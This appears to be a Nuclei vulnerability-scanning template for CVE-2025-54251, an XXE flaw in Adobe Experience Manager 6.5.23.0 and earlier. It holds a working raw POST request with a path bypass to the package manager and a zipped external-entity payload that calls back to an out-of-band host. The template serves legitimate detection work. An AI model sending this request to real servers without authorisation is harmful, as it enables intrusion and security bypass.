id: CVE-2025-54251

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection
  author: DhiyaneshDK,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.
  impact: |
    Attackers can inject malicious XML payloads to bypass security features and potentially access sensitive information through external entity references.
  remediation: |
    Upgrade Adobe Experience Manager to a version later than 6.5.23.0 that properly disables external entity processing in XML uploads.
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2025-54251
    epss-score: 0.09423
    epss-percentile: 0.92944
    cwe-id: CWE-91
    cpe: cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.title:"aem sign in"
      - http.component:"adobe experience manager"
      - cpe:"cpe:2.3:a:adobe:experience_manager"
  tags: cve,cve2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev

variables:
  marker: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
  xxe_payload: '<!DOCTYPE x [<!ENTITY foo SYSTEM "http://{{interactsh-url}}/{{marker}}">]><x>&foo;</x>'

http:
  - raw:
      - |
        POST /crx/packmgr/service/exec.json;x='x/graphql/execute/json/x'?cmd=upload&jsonInTextarea=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Content-Type: multipart/form-data; boundary={{boundary}}

        --{{boundary}}
        Content-Disposition: form-data; name="package"; filename="{{filename}}.zip"
        Content-Type: application/zip

        {{zip('META-INF/vault/privileges.xml',xxe_payload)}}
        --{{boundary}}--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'success')"
          - "contains(interactsh_protocol, 'http')"
        condition: and
# digest: 4a0a0047304502200f684e7bfca83a7ba5b87badd78395c84eac120468e18699aff47995b3afdd0b022100b57e95e4eafc5c8a0c93f1e720020eb8f0f8583f300d30acdff9e8fcf48fcf5c:922c64590222798bb761d5b6d8e72950